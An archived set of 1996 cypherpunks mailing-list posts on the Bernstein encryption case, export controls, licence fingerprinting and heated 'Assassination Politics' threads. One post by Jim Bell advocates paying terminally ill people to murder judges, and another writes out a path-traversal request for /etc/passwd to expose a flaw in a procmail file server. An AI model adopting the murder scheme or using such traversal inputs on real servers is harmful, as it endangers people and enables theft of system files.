  --  Thomas Jefferson, regarding Shay's Rebellion and anarchy.



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------

Just say NO to prescription DRUGS.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 22 Sep 1996 15:38:14 +0800
To: "Mark M." <cypherpunks@toad.com
Subject: Re: Bernstein hearing: The Press Release
Message-ID: <199609220525.WAA21842@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:30 PM 9/21/96 -0400, Mark M. wrote:
>On Sat, 21 Sep 1996, jim bell wrote:
>
>> At the risk of being a devil's advocate, let me suggest that you are 
>> conceding too much even with the preceding paragraph.  The 1st amendment 
>> says nothing about preventing speech  which (even admittedly) would result 
>> in "direct, immediate, and irreparable damage to our nation or its people."
>
>I believe there is one section in the Constitution that says that speech
>harmful to national security is not protected under the 1st amendment. 

I can't think of what portion of the Constitution you're referring to.  But 
chances are, somebody else will see this reference and comment.

> However,
>I don't agree with this provision at all.  "National security" is a phrase 
that
>is applied to anything from information on the JFK assassination to DES source
>code.

...and it's one of the most abused concepts there is.


>> I could list many more, but won't because of lack of space.  But notice 
>> that, presumably, each and every one of these incidents was AT ONE TIME 
kept 
>> secret, arguably because it would be better for the country to do so.  
Thus, 
>> presumably it was thought or at least asserted that to reveal them would 
>> cause "damage to our nation or its people."
>
>If secret information was released, it would cause most people to completely
>lose respect for the government (some people call this damage -- I call it
>progress).

Yes!  I, of course, agree with the latter interpretation as well.   It is 
precisely this distinction which, I believe, makes it so vital that lawsuits 
such as this Bernstein one NOT "concede" what doesn't need to be conceded.  
All they should say is that even if there are secrets which the law should 
protect, they cannot include information known by civilians in peacetime.


>> The way you've written the paragraph I've quoted above, it appears that you 
>> are somehow acknowleding that there  are certain circumstances where 
certain 
>> types of speech are controllable because they are "harmful," but you fail 
to 
>> explain how even this constitutional restiction is tolerable.    Frankly, I 
>> don't see it!  What you need to do is to be far more specific about such 
>> speech and exactly where it can be controlled.
>
>There may be certain circumstances under which speech can be directly harmful.
>Military operations and missle launch codes are things that should be kept
>secret.  Information about high-powered weapons should be too.  If the 
Japanese
>had been able to get information about how to build A-bombs during WWII, major
>cities in the U.S. probably would have been completely wiped out.  I don't 
like
>the idea that the government has the power to decide what's harmful and what
>isn't, but there are beneficial uses of the provision.

The few examples that exist, as you've selected them above, seem to be 
almost entirely based on military secrets in time of war.  It is not clear 
whether a non-security clearance civilian is restricted in any way, nor 
should he be.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 22 Sep 1996 13:21:22 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Assassination Politics, was Kiddie porn on the Internet
In-Reply-To: <199609212321.QAA07036@mail.pacifier.com>
Message-ID: <Pine.SUN.3.94.960921225528.24100A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 21 Sep 1996, jim bell wrote:

> At 01:51 PM 9/17/96 -0700, Steve Schear wrote:
> >>On Mon, 16 Sep 1996, Steve Schear wrote:
> >>
> >>> Someone wrote:
> >>> We've all heard these arguments, but are they true?  Who says so, and how
> >>> can they be certain? Jim's suggestion has never, to my knowledge, been
> >>> tried on a consistant, large, scale.  When all conventional alternatives
> >>> have been tried and fail, what have we or the starving children got to
> >>> lose?
> >>
> >>I think "Lord of the Flies" answers this question quite well.
> >
> >Does it?  LOTF was fiction.  Can you identify a recent instance in which a
> >non-governmental organization attempted to influence political/military
> >events via a concerted AP?
> 
> As you understand, I really have to question anybody who would take an 
> extraordinarily contrived work of fiction like LOTF and exrtrapolate from it 
> as some sort of "answer" to AP.  However, Unicorn is sufficiently confused 
> that it's not surprising that this would come from him.
> 
> While it's been well over two decades since I read it, LOTF engages in the 
> artifice of separating out a handful of near-pre-adolescent boys, who don't 
> seem to get along particularly well while stuck on an island after being 
> shot down during a war.  (Presumably, WWII.)  It's hard to understand what 
> kind of lesson we could learn from this, particularly since one person's 
> opinion of what might happen should such an extraordinary and unlikely event 
> occur can't be all that more significant or valuable than another.  
> 
> Or, what if such an event actually happened, and the outcome was quite 
> different?  What would that say about Golding's opinions?   Or, suppose a 
> similar event occurred, but instead of a dozen boys it was a co-ed college's 
> students, or a few geriatrics, or a family, or a few middle-aged women, 
> or...what?    What, exactly, are we learning from one specific speculation 
> that Golding happened to want to commit to paper?
> 
> Unfortunately (or, perhaps _fortunately_?) I don't think we're going to hear 
> from Unicorn why he thinks one particular dime novel is any more 
> revelational about human behavior than any other.

Your "grasp" of literature gives the list my answer without me having to
say a word.

I notice you chose to ignore the factual political examples I gave.  Not
that this surprises me.  "Your" concept, of rule by terror, has thousands
of examples in historical context.

I simply refuse to debate the matter any longer as it is clear you are not
open to reasoned debate, nor, it would seem, are you clearly possessed of
reason.

> 
> Jim Bell
> jimbell@pacifier.com
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 22 Sep 1996 13:30:07 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: The GAK Momentum is Building...
In-Reply-To: <199609220058.RAA10810@mail.pacifier.com>
Message-ID: <Pine.SUN.3.94.960921230009.24100B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 21 Sep 1996, jim bell wrote:

> At 01:58 PM 9/20/96 -0400, Black Unicorn wrote:
> >On Wed, 18 Sep 1996, Dale Thorn wrote:
> >> My comment: Once the big Corp.'s get used to the new game, they'll put 
> >> the non-critical stuff out there for Mr. Freeh, and for the really 
> >> secret data, if the cops confiscate anything they can't read, the Corp. 
> >> security will put it off on a fall-guy, even as high as the CEO if 
> >> necessary. I just wanna see one case where a federal judge will try to 
> >> bleed a big company for contempt for "refusing" to decode and hand over 
> >> some ostensibly encrypted data. Matter of fact, there are probably cases 
> >> similar to this that have already been through the appeals courts.
> >
> >Several.  Most involve foreign banks refusing to turn over records to U.S.
> >courts.  Most result in powerfully large fines imposed on banks, often on
> >a per diem basis.
> 
> 
> But as usual, you ignore the obvious solution to the problem.  Let's suppose 
> the amount of the fine is set at $1000 per day.  Actuarially, this works out 
> to be the interest (at 5% per year) on $7.3 million dollars in principle.  
> In other words, if you can eliminate the fine for less than $7.3 million, 
> you're better off doing it.

Fines tend to run in the ten thousands per diem.

> 
> Naturally, you won't even consider the possibility of going outside the 
> system to solve a problem.

I hardly want to get back into this debate.  I live outside the system.  I
do not murder people.

. The rest of us notice that there are probably 
> thousands of terminally-ill people who would gladly act as a human kamikaze 
> and get rid of any judge inclined to impose such a fine, for a payment of 1% 
> of this principle amount to a family member or loved one, leaving 99% 
> available for the few other judges foolish enough to basically commit 
> suicide by taking up a futile gesture.
> 
> This kind of operation is best arranged by what might be described as an 
> "insurance company," which will divide the risk among client companies until 
> everyone learns what the score really is.   It wouldn't take long before no 
> such fines are ever imposed.
> 
> But nah, this is much too complex for you.

Coming from someone willing to prey on the despair of termanally ill
individuals this stands as a compliment.

Again, I propose that Mr. Bell would be the first to go in "his" system.
 
> 
> Jim Bell
> jimbell@pacifier.com
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 22 Sep 1996 13:22:28 +0800
To: mcguirk@indirect.com (Dan McGuirk)
Subject: Re: Where to write crypto?
In-Reply-To: <Pine.BSD/.3.91.960921145321.14762C-100000@bud.indirect.com>
Message-ID: <199609220419.XAA14381@homeport.org>
MIME-Version: 1.0
Content-Type: text


Dan McGuirk wrote:
| On Sat, 21 Sep 1996, Dan McGuirk wrote:
| > If I want to go to a country outside the United States to write 
| > cryptographic code that will be freely distributable, what's the best 
| > place to go?
| 
| Or, on the other hand, is there no way that a U.S. citizen can legally do 
| this?

	Thats not clear.  The ITARs seem, on their face, to create a
prior restraint on speech based on its content, and forbid Americans
the right to leave the country to pursue their livlihoods.  The odds
of geting persecuted seem pretty low.

	As to the (predictable) comment that I'm not doing this, I'd
be happy to entertain offers of crypto work that are not in the US,
possibly leading to me being a test case.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 22 Sep 1996 15:04:11 +0800
To: adam@homeport.org (Adam Shostack)
Subject: Re: How to use procmail
In-Reply-To: <199609050006.TAA07462@homeport.org>
Message-ID: <199609220423.XAA00811@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Adam Shostack wrote:
> :0
> * From bal@swissnet.ai.mit.edu
> {
>    :0 h
>    * >10000
>    /dev/null
> 
>    :0 h
>    *^Subject:.*no keys match
>    /dev/null
> 
>    :0:
>    *Subject: Your command, ADD
>    $DEFAULT
> 
> 
>    :0E
>    | pgp +batchmode -fka

Isn't this vulnerable to "deadbeef" attacks? I can also see an attack when 
someone sends you an email with the spooofed "From " address and a user
name that is the same (or almost the same) as that of your trusted parties.

Suppose that you correspond with mrx@provider.com and you use encryption
command 

pgp -eaf mrx

Then I can send you a bogus email containing a key for mrx@bogus.com 
and next time you encrypt something for your friend nrx@provider.com,
you will actually encrypt it with the wron key. If I intercept your
email, your message to mrx can be compromised.

> # basic file server.  Only sends whats in .outbound
> :0 
> * ^Subject: (SEND|get) [0-9a-z][-_/0-9a-z.]+$
> * !^Subject:.*[ /.]\.
> * !^FROM_DAEMON
> {
>    # FILE=`formail -x Subject: | sed 's/.* //'`
>    FILE=`sed -n -e '/Subject:/s/.* //p' -e '/^$/q'`
> 
>   :0c 
>   | (formail -rt -A"Precedence: junk";\
>      cat $HOME/.outbound/$FILE) | $SENDMAIL -t

*If* .outbound has some subdirectories (say subdir), How about this email: 

From: dumbass@aol.com
Subject: GET subdir/../../../../etc/passwd
Reply-To: blin@algebra.com

xxx


	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 22 Sep 1996 14:11:14 +0800
To: cypherpunks@toad.com
Subject: Re: Bernstein hearing: The Press Release
In-Reply-To: <199609212340.QAA07773@mail.pacifier.com>
Message-ID: <Pine.LNX.3.95.960921231150.1571A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 21 Sep 1996, jim bell wrote:

> At the risk of being a devil's advocate, let me suggest that you are 
> conceding too much even with the preceding paragraph.  The 1st amendment 
> says nothing about preventing speech  which (even admittedly) would result 
> in "direct, immediate, and irreparable damage to our nation or its people."

I believe there is one section in the Constitution that says that speech
harmful to national security is not protected under the 1st amendment.  However,
I don't agree with this provision at all.  "National security" is a phrase that
is applied to anything from information on the JFK assassination to DES source
code.

> I could list many more, but won't because of lack of space.  But notice 
> that, presumably, each and every one of these incidents was AT ONE TIME kept 
> secret, arguably because it would be better for the country to do so.  Thus, 
> presumably it was thought or at least asserted that to reveal them would 
> cause "damage to our nation or its people."

If secret information was released, it would cause most people to completely
lose respect for the government (some people call this damage -- I call it
progress).

> 
> The way you've written the paragraph I've quoted above, it appears that you 
> are somehow acknowleding that there  are certain circumstances where certain 
> types of speech are controllable because they are "harmful," but you fail to 
> explain how even this constitutional restiction is tolerable.    Frankly, I 
> don't see it!  What you need to do is to be far more specific about such 
> speech and exactly where it can be controlled.

There may be certain circumstances under which speech can be directly harmful.
Military operations and missle launch codes are things that should be kept
secret.  Information about high-powered weapons should be too.  If the Japanese
had been able to get information about how to build A-bombs during WWII, major
cities in the U.S. probably would have been completely wiped out.  I don't like
the idea that the government has the power to decide what's harmful and what
isn't, but there are beneficial uses of the provision.

Mark
- -- 
PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMkSywSzIPc7jvyFpAQEpbwgAwKrTGe/OoZ3gq+672WuRXopabjXBDnz4
5ZxX4NEAKk5yaWlw+WBcXF3ykAOUa6JeRFrxoehIm3LChdnEdrrE7tzuf2ftqpzR
MOcPsy2YKcasCgHasDLx99E4XtnU1kn+ncllYueClEnEL8nkY3nhBq1+JwHXp1A0
Lyfgx5MLX2iTVGZCFeXLKYVQ188JG0rRSU8dUJX0FjJtI0LhTUytvbMg8z0Z1yZp
i26FM2QUfF+QLlkWT7sy2JGdxhUGmuOZIWBqZcePQ0NXzwb4lQ1TYWgCC9ZRHVr9
E7SOrkgr2u/eLRm7pAL9n4G8eUcQ+3saOx+rnCUDdEeBEVheUNfMJA==
=O904
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 22 Sep 1996 17:16:09 +0800
To: hallam@ai.mit.edu
Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE]
Message-ID: <199609220708.AAA20288@dfw-ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:34 PM 9/21/96 -0400, Phill wrote:
>[AP drivel deleted]

>If it could the US would have assasinated Saddam by now. It can't because it
>is too difficult to find out where exactly a person will be. 

It's perfectly doable, it's just not politically expedient.
One reason is that if they kill Saddam, they no longer have an
excuse to keep threatening and attacking Iraq and making themselves look good.
Another is that National Leaders have a tacit understanding between
themselves never to assassinate other politicians [well, hardly ever....]
If you break the taboo, you're implicitly inviting everyone else
to go gunning for you, and it's too easy to do if there are enough
people who really want you dead, especially well-organized people
like a foreign army or spy service.

If the US _had_ really wanted to assassinate Saddam, they could have
hired professionals to do the job (like Mossad.)  Instead they
killed 200,000 other Iraqis, including civilians, draftees, and a
few tens of thousands of real soldiers.


>In addition *ANYONE* who attempted to implement AP would be someone *I*
>would regard as a tyrant and therefore a legitimate target by the rules

Yup.

>I think that this type of talk is incredibly dangerous. There are plenty of
>people on the net who are psychos and if you spread AP drivel arround someone
>is going to act on it. 

I think a more realistic danger is that the government will use it
as an excuse to attack all the techniques for private communications
that cypherpunks have been suggesting will make AP possible.


>PS it is not censorship to stop people from advocating murder.

Nonsense.  It certainly _is_ censorship, and it's hypocrisy to
suggest otherwise.  You can argue whether it's _justified_ censorship,
just like the AP advocates argue whether assassination is 
justified murder, but censorship it is.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@acadian.net>
Date: Sun, 22 Sep 1996 15:16:35 +0800
To: cypherpunks@toad.com
Subject: Re: USA_exe   (Kiddie porn on the Internet)
In-Reply-To: <199609220023.AAA29950@pipe4.ny3.usa.pipeline.com>
Message-ID: <Pine.SOL.3.93.960922000739.7014A-100000@stiletto.acadian.net>
MIME-Version: 1.0
Content-Type: text/plain



If you think the Mexican government would sit still while whatever
the rebels are called this week escalated their violence, you'd be
crazy. With the sort of stuff being suggested, the retaliation
wouldn't just get SubCommander Marcos, but the whole submarine
and the rest of the fleet ;-).

Vulnerability works both ways.


Phil Fraering              "And the moral of the story is,
pgf@acadian.net            *never count your boobies until they
318/261-9649               are hatched*."
                            - James Thurber, "The Unicorn in the Garden"







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 22 Sep 1996 10:49:56 +0800
To: cyhperpunks@toad.com
Subject: USA_exe   (Kiddie porn on the Internet)
Message-ID: <199609220023.AAA29950@pipe4.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 21, 1996 16:19:53, 'jim bell <jimbell@pacifier.com>' wrote: 
 
 
>Pardon me, but what's wrong with this?    Follow the news more closely,
and  
>you'll hear of a group which is operating in southern Mexico, the "EPR,"
which  
>is killing off government employees, politicians, and police.  True,
they're  
>not implementing the mathematical, digital-cash basis behind AP, but they
see  
>to be making good progress against the corruption which is Mexico.   
>Increase their productivity by a factor of 10, and the Mexican government
would  
>be terrified.  Increase it by 100, and the Mexican government would fall
within  
>a few months. 
 
 
Jim's makes a good, if gruesome, point here, about the vicious realities of
do-or-die AP, by even our own apple pie government. 
 
 
The Washington Post reports at length today on the Defense Department's
disclosure yesterday of heretofore classified trainging manuals used in the
School of the Americas to instruct Latino troops on killing a wide range of
civilians for political purposes. 
 
 
To read "Army Instructed Latins On Executions, Torture," about your tax
dollars working the AP angle: 
 
 
http://jya.com/usaexe.txt 
 
 
USA_exe 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 22 Sep 1996 17:46:24 +0800
To: cypherpunks@toad.com
Subject: Re: Bernstein hearing: The Press Release
Message-ID: <199609220730.AAA20792@dfw-ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:24 PM 9/21/96 -0800, Jim Bell wrote:
>At 11:30 PM 9/21/96 -0400, Mark M. wrote:
>>I believe there is one section in the Constitution that says that speech
>>harmful to national security is not protected under the 1st amendment. 
>I can't think of what portion of the Constitution you're referring to.  But 
>chances are, somebody else will see this reference and comment.

The First Amendment does not contain the phrase "national security"
anywhere in it.  It does, however, begin with a rather explicit
"Congress shall make no law" which it applies to a bunch of things.
However, the body of the Constitution does say there should be a
Supreme Court, and the Supreme Court has (fairly reasonably) given itself
the job of deciding what's Constitutional and what's not.
The Supremes have, over the years, made a bunch of generally outrageous
decisions about what kinds of speech are protected by the First Amendment
and what kinds aren't, though their opinions have been gradually
improving since some of the really appalling ones earlier in the century.

By the way, alt.federal.judge.bork.bork.bork has recently come out with
a book in which he discusses issues like censorship.  He's in favor of it.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 22 Sep 1996 10:51:22 +0800
To: cypherpunks@toad.com
Subject: USA_exe  (Kiddie porn on the Net)
Message-ID: <199609220037.AAA23283@pipe2.ny1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 21, 1996 16:19:53, 'jim bell <jimbell@pacifier.com>' wrote:   
 
  
>Pardon me, but what's wrong with this?    Follow the news more closely,
and   
>you'll hear of a group which is operating in southern Mexico, the "EPR,"
which   
>is killing off government employees, politicians, and police.  True,
they're   
>not implementing the mathematical, digital-cash basis behind AP, but they
see   
>to be making good progress against the corruption which is Mexico.    
>Increase their productivity by a factor of 10, and the Mexican government
would   
>be terrified.  Increase it by 100, and the Mexican government would fall
within   
>a few months.  
  
-------- 
 
  
Jim's makes a good, if gruesome, point here, about the vicious realities of
do-or-die AP, by even our own apple pie government.   
 
  
The Washington Post reports at length today on the Defense Department's
disclosure yesterday of heretofore classified trainging manuals used in the
School of the Americas to instruct Latino troops on killing a wide range of
civilians for political purposes.  
  
  
To read "Army Instructed Latins On Executions, Torture," about your tax
dollars working the AP angle:  
  
  
http://jya.com/usaexe.txt  
  
  
USA_exe  
  
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Sun, 22 Sep 1996 15:07:52 +0800
To: Jeff Barber <jeffb@issl.atl.hp.com>
Subject: Re: DL in exchange for fingerprint
In-Reply-To: <199609191223.IAA13606@jafar.issl.atl.hp.com>
Message-ID: <Pine.BSI.3.91.960922003819.10846A-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 19 Sep 1996, Jeff Barber wrote:

> Oh joy.  You no longer need to be arrested to get fingerprinted
> in Georgia.  On the front page of Wednesday's Atlanta Journal, under
> the headline "Now you can get driver's license in minutes":
> Just what I would have called it: a great idea.  Is it true that 31
> other states take your fingerprint as part of the license application?
> I feel sick.

I know for sure Hawai'i does -- and not just for licenses.  They take em 
for civil ID's too -- and are incredibly bitchy about forms of ID.

-Millie




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sun, 22 Sep 1996 16:02:42 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: timmy waxes a widdle on AP
In-Reply-To: <199609211946.MAA27996@dns2.noc.best.net>
Message-ID: <Pine.BSF.3.91.960922003553.469D-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 21 Sep 1996, James A. Donald wrote:

> At 08:11 PM 9/17/96 -0700, Vladimir Z. Nuri wrote:
> > but I'm still a bit confused about those prices. what determines
> > them, anyway? risk to the assassin? it seems that it ought to be
> > as easy to snuff out one person as it would another. e.g. everybody
> > walks alone out at night at different times, it seems.
> 
> Although government services to the rich and poor cost about 
> the same, the quality is radically different.  Thus the risk
> involved in killing a poor person is vastly less than the 
> risk involved in killing a middle class person.
> 

I think it is more likely an us-vs.-them mentality, rather than the cost 
of educating the person in question. If someone much poorer than you is 
killed in a poor neighborhood, you don't feel as threatened - it is one 
of "them" - If someone of equal or greater socio-economic background 
suffers a violent death, you begin to think "it could happen to me, too." 
Now it is a matter of "us." The higher up the scale you go, the more 
people on the "us" side of the coin, with more money/political clout as 
well. This increases the demand to apprehend the killer, which increases 
the risk to the killer, hence, a higher price for a hit on a target in a 
higher socio-economic position.

It is not unusual for the investigation of drug-related murders to be 
lax; the "tax-paying" majority often says "let them bump each other off." 
With lax enforcement, lack of public outcry, there's less risk. The price 
is lower. Now if it is the lawyer that lives just down the street ...

Ooops. Bad choice of profession.   :)

Bad wombat. No biscuit.

g'nite, all.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sun, 22 Sep 1996 16:10:37 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Assassination Politics, was Kiddie porn on the Internet
In-Reply-To: <199609212321.QAA07036@mail.pacifier.com>
Message-ID: <Pine.BSF.3.91.960922005548.469E-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 21 Sep 1996, jim bell wrote:

> At 01:51 PM 9/17/96 -0700, Steve Schear wrote:
> >>On Mon, 16 Sep 1996, Steve Schear wrote:
> >>
> >>> Someone wrote:
> >>> We've all heard these arguments, but are they true?  Who says so, and how
> >>> can they be certain? Jim's suggestion has never, to my knowledge, been
> >>> tried on a consistant, large, scale.  When all conventional alternatives
> >>> have been tried and fail, what have we or the starving children got to
> >>> lose?
> >>
> >>I think "Lord of the Flies" answers this question quite well.
> >
> >Does it?  LOTF was fiction.  Can you identify a recent instance in which a
> >non-governmental organization attempted to influence political/military
> >events via a concerted AP?
> 

Where is Jimmy Hoffa?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 22 Sep 1996 18:43:36 +0800
To: Black Art <blackart@ctrl-alt-del.com>
Subject: Re: Going AP Shit on the Internet
In-Reply-To: <3.0b16.32.19960921222547.00e3e3e0@www.ctrl-alt-del.com>
Message-ID: <3244F383.4743@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Black Art wrote:
> At 06:22 PM 9/21/96 -0700, Dale Thorn wrote:
> >[more examples of "why it wouldn't work" deleted]
> >This is like Buliosi hyping his superior strategy all over TV (at 
> >least
> >he had the decency to say the jury was basically honest).  It's still
> >strategy, folks.  It doesn't say anything about the people's right to
> >have more control over what is already happening.  I just wish
> >entities like Black Art would say "I'm doing all I possibly can to
> >make sure the people DO get involved when govt. *decides* to murder
> >someone".  Then, entities like Black Art wouldn't be able to stand
> >back in their righteousness and say that they're NOT responsible for 
> >what their govts. do.

> What do you mean "when"?  Government murders people all the time.  As 
> for when you will find out about it...  Most of the time, you will
> not. Governments have gotten very good at hiding their crimes.  Either 
> by orders of secrecy, appeals to patriotism, or doing it out of view
> of the general public.
> I realize my limitations in taking on an enitity as large as Uncle
> Sugar. I do what I can to foil his plans (which is not much), but I do 
> not believe for a moment that he actually listens to the cries of the 
> peasants unless he wants to.  Government is like a servant.  He 
> wanders about your house at
> all hours.  Sneeks up on you when you are not looking.  And will slip
> something nasty into your drink if you become too much of a pain and
> beleive that they will benifit by your death.
> Governments are groups of individuals.  Since they are not me, I have 
> no responsibility over their actions.  (Any more than I have over 
> yours.)
> Are you responsible for what your government does?  Can we hold you
> accountable for them?  Punish you for those crimes?
> I didn't think so.

I'm hearing even more strategy, it would seem.  I don't see the 
relevance of how govt. behaves (i.e., like a bad uncle who hangs around 
too long and molests the kids, etc.) to who's responsible.  If you live 
in the U.S., that govt. is your agent, carrying out your 
representatives' instructions, and paid with your tax dollars.  Unless 
and until this becomes a literal dictatorship (and there is a valid 
argument that it applies even then), you are responsible for whatever 
your paid agents do, from the street cop to the top politico.

It's too bad your fellow citizens shirk their duty and watch TV instead, 
but issuing the above kinds of denial doesn't take the blood off of your 
hands or mine.  Now maybe it would take God (for example) to judge 
whether you, I, or Joe Blow is more guilty, for lack of participation or 
some other citizen crime, but you can't put all the blame on your hired 
agents for their crimes, when you know very well what kinds of things 
they do, and you continue to fund them.  You have to be considered an 
accessory, at least.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 22 Sep 1996 15:42:05 +0800
To: cypherpunks@toad.com
Subject: Continuing spam from Timmy May and his friends
Message-ID: <VT6muD9w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I recently sent the following article to this mailing list:

]To: cypherpunks@toad.com
]Subject: Re: DL in exchange for fingerprint
]From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
]Comments: Dole/Kemp '96!
]Message-Id: <awTLuD1w165w@bwalk.dm.com>
]Date: Sat, 21 Sep 96 08:00:57 EDT
]In-Reply-To: <Pine.SUN.3.94.960921021401.2717A-100000@polaris>
]Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y.
]
]Black Unicorn <unicorn@schloss.li> writes:
]> > Do you simply drive without a valid driver's license? I know some folks who
]> > do, of course, but it's not something that's "worth it" to me.
]>
]> Some jurisdictions (D.C. is a good example) are such a joke it's not
]> funny.  An associate of mine literally MADE his own Italian Driver's
]> license and turned it in, took an eye test, and walked out with a nice new
]> D.C. license.
]
]In NYC a very high percentage of drivers don't have licences, have suspended
]licences, etc. Generally no one has the time to bother with them unless they
]want to nail them for something else. A couple of years ago we were involved in
]a minor car accident with a Chassidic Jew who tried to leave the scene of the
]accident. My wife chased him and stopped him. :-) The cops came and discovered
]that he had no papers (including no driver's licence, no insurance, etc). They
]gave him about $500 worth of tickets for driving without a licence, leaving the
]scene of an accident, etc (which I rather doubt he was planning to pay) and let
]him drive on (still without the licence).
]
]---
]
]Dr.Dimitri Vulis KOTM
]Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

I received the following e-mail from either Timmy May using an alternate
account, or someone whose IQ is similar to Timmy's, in response:

]From Adamsc@io-online.com  Sat Sep 21 22:40:36 1996
]From: Adamsc@io-online.com (Adamsc)
]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
]Date: Sat, 21 Sep 96 19:40:29 -0800
]Reply-To: "Chris Adams" <adamsc@io-online.com>
]X-Mailer: Chris Adams's Registered PMMail 1.52 For OS/2
]X-Filtered: By PMMail 1.52 For OS/2
]Mime-Version: 1.0
]Content-Type: text/plain; charset="us-ascii"
]Content-Transfer-Encoding: 7bit
]Subject: Re: Re: DL in exchange for fingerprint
]Message-Id: <19960922023957609.AAA206@GIGANTE>
]
] You are being gently flamed because.
]
]   [X] you continued a boring useless stupid thread
]   [ ] you repeatedly posted to the same thread that you just posted to
]   [x] you repeatedly initiated incoherent, flaky, and mindless threads
]   [x] you posted a piece riddled with profanities
]   [ ] you advocated Net censorship
]   [ ] you SCREAMED! (used all caps)
]   [x] you posted some sort of crap that doesn't belong in this group
]   [ ] you posted the inanely stupid 'Make Money Fast' article
]   [ ] you threatened others with physical harm
]   [x] you made a bigoted statement(s)
]   [x] you repeatedly assumed unwarranted moral or intellectual superiority
]   [x] you are under the misapprehension that this group is your preserve
]   [x] you repeatedly shown lack of humor
]   [x] you are apparently under compulsion to post to every threat
]   [?] you are posting an anonymous attack
]
]  >>> Thank you for the time you have taken to read this.  Live n' Learn.<<<
]
]
]
]# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
]# cadams@acucobol.com | V.M. (619)515-4894
]"I have never been able to figure out why anyone would want to play games on
]a computer in any case when the whole system is a game.  Word processing,
]spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
]	-- Duncan Frissell
]
]

Just now I received about 2 dozen similar e-mails from this address, which
therefore must be Timmy May's - I can't believe that there are two people on
the 'net this stupid and obnoxious and prone to lying. In particular, I receive
this spam from Timmy in response to each 'crypto-relevant wire clippings' post.

Timmy May is definitely turning this mailing list into a political rant
menagerie where cryptography discussions are not welcome.

---

Dr.Dimitri Vulis KOTM
